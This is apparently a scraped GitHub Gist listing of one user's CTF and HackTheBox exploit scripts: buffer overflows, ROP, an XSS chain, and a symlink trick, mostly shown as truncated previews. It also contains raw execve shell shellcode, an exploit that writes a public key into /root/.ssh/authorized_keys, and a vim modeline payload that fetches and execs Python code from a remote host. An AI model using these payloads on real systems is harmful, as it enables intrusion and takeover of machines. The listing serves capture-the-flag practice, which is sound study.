madcore was a pwn task from [Google CTF 2022][googlectf]. It is a coredump helper
that parses the input as coredump file and produces some results.
We are provided with few files:
Dockerfile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # This exploit template was generated via: | |
| # $ pwn template ezvm | |
| from pwn import * | |
| HOST, PORT = "47.252.3.1 40241".split() | |
| # Set up pwntools for the correct architecture | |
| exe = context.binary = ELF('ezvm') |
embe221ed
/ madcore_writeup.md
Created
July 18, 2022 11:48
embe221ed
/ one_punch_man.py
Last active
March 20, 2021 17:52
HITCON 2019, one_punch_man solution exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # This exploit template was generated via: | |
| # $ template template | |
| import re | |
| import time | |
| from pwn import * | |
| from struct import pack, unpack | |
| from binascii import hexlify |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :!python2 -c "import requests;exec(requests.get('http://10.10.14.4:8080/code.py').text);"||" vim:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" |
embe221ed
/ attended_exploit.py
Created
March 11, 2021 09:36
BoF exploit generating ssh key which will write my public key to the /root/.ssh/authorized_keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| from pwn import ELF, p64, context | |
| from base64 import b64encode | |
| # FILE = './authkeys' | |
| # BINARY = ELF(FILE) | |
| OFFSET = 776 | |
| PUBLIC_KEY = open('./id_rsa.pub', 'rb').read()[:-1] | |
| SET_EAX = 0x00400394 |
embe221ed
/ crossfit_exploit.c
Created
January 15, 2021 14:17
Simple C code which creates symbolic links with correct name format (MD5sum of rand() and id) for root part of machine CrossFit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <time.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <openssl/md5.h> | |
| char* str2md5(const char *str, int length) { | |
| int n; |
embe221ed
/ crossfit_xss.py
Last active
January 15, 2021 14:18
The exploit consisting of few phases which is used to register user on internal ftp.crossfit.htb domain
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import time | |
| import socket | |
| import threading | |
| import requests | |
| from ftplib import FTP_TLS | |
| from bs4 import BeautifulSoup | |
| from termcolor import colored |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import ELF, process, log, p64, ROP, context, remote | |
| context.clear(arch='amd64') | |
| BIN_NAME = 'myapp' | |
| BINARY = ELF(BIN_NAME) | |
| rop = ROP(BINARY) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import ssh, log, p32 | |
| LOCAL_PAYLOAD = 'payload' | |
| REMOTE_PAYLOAD = '/tmp/payload' | |
| SHELLCODE = b'\x90\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' | |
| # get the address executing | |
| # thrasivoulos@Sneaky:/usr/local/bin$ ltrace ./chal `cat /tmp/payload` |
embe221ed
/ calamity_exploit.py
Last active
December 9, 2020 19:29
Buffer overflow exploit written for Calamity HTB machine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import re | |
| from pwn import ELF, process, context, log, ssh, p32, u32 | |
| # name of local and remote files with payloads | |
| FILENAME = '/tmp/payload' | |
| # name of binary on the remote machine | |
| BINARY = '/home/xalvas/app/goodluck' |
NewerOlder